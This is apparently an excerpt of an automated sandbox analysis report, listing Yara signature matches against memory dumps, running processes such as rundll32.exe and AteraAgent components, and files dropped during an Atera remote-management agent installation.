Source: Yara match	File source: 00000033.00000002.2684946960.00000256F030C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251006DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2794634831.0000019F9C036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2947253751.0000021F24DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2036704581.0000028A55340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2774246214.0000017568C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.000002510006B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2291098978.00000150D7A40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2580997801.000002A34B5F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2695950550.00000256F20D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1848517334.000002167B921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2211260331.00000247805AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2220576029.00000247F9AB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2393257978.000001A572009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2453620644.000001A120B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2036704581.0000028A5538E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037499219.0000028A55CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2999483708.0000023071BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5003A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2947253751.0000021F24E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2574946100.000002A332E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450784251.0000028A1918F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061211828.0000020593315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.3061122675.0000011CCB680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2941530850.000000127993F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EAEB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2999483708.0000023071B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256806FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2368827781.000001C2EAC40000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2552937808.000001F163497000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.000002510044C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2774511491.00000175695DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.0000021600166000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2960467176.0000021F25452000.00000002.00000001.01000000.0000003E.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2232287306.00007FFDF1019000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1846105414.00000216792C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450784251.0000028A191F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2088931639.00000199E5330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.000002517956F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2794634831.0000019F9BEC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EAE2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2794634831.0000019F9C147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037499219.0000028A55CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2062023214.0000020593BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2153178803.00000199E5310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2660826367.000000E60D6F5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773266363.0000017568C5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500368000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2947253751.0000021F24DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2999483708.0000023071C0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2062023214.0000020593C23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256806C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2516150200.000001F14ADE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB33C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385596719.000001A570E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2215218351.00000247F7939000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2291524671.00000150D7A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.0000025179568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1850383596.00007FFD9B6C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2215218351.00000247F797F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2371335324.000001C2EB000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2791521532.0000019F9BDA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2397219667.000001A572300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1848517334.000002167B8ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2941515088.0000003732901000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061211828.0000020593290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.3071172900.0000011CCB95B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2695271047.00000256F1EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB3460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1846105414.0000021679304000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2574440622.000002A3327B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.3065551701.0000011CCB6F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385596719.000001A570E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037499219.0000028A55C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EAE1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.0000025680426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2688813637.00000256F0450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2281891177.00000150BEA56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3208734070.0000021F3DDF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.0000025680287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.000002160008C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A50046A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2785759950.0000019F9B69B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2508147012.000001F14A2C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A3325A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF492000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A33256C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB3357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2555247568.000001F163524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.000002517959C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1846105414.0000021679351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2291367988.00000150D7A64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450684383.0000028A19130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2696035678.00000256F20DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2948560613.0000011CB25D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2547834924.000001F163320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2455544706.000001F751A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2214664032.00000247F7830000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2393257978.000001A571F76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2151626774.000002249A8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB26E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB269D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2945403740.0000023000001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.00000251795BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2373005329.000001C2EBD10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2695385243.00000256F20B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.000002160017C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2785759950.0000019F9B652000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EADE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2152982733.00000199E5103000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AB3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2352910675.000001C2805B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF524000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AteraAgent.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AteraAgent.exe PID: 5768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AteraAgent.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cscript.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageSTRemote.exe PID: 1524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageMonitoring.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageMonitoring.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cscript.exe PID: 3520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageTicketing.exe PID: 2848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageMonitoring.exe PID: 2252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageProgramManagement.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AgentPackageHeartbeat.exe PID: 1984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2992, type: MEMORYSTR
Source: Yara match	File source: \Device\ConDrv, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF3F79CFC1DC95853D.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFB365D0C004639C0B.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF9DAEB42AA8FFCAB8.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF780BCEC102FED09B.TMP, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\57a755.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-11-2024 10_13_27-log.txt, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\AteraSetupLog.txt, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF39F7B078501F4296.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSI2247.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF02DC3C0CC880FEF6.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF39CB4E03F3FCB28C.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\57a762.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIC6C5.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF7688D5E64E43D8F6.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFE2EC260D0FB6D90A.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFE97790A727CB1E4E.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFA2543C02866615B8.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF5016C29A7A75E6D0.TMP, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF3491A3C7A4B2661D.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIEE25.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIA89C.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIE7A0.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF87F5534CBA186A27.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSI39FA.tmp, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF15D198E16D3D18AB.TMP, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\57a75a.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-11-2024 10_13_28-log.txt, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF8B61ED29D3624AAC.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIAB6C.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIC8BA.tmp, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFADA93DBF4BCB97E3.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, type: DROPPED
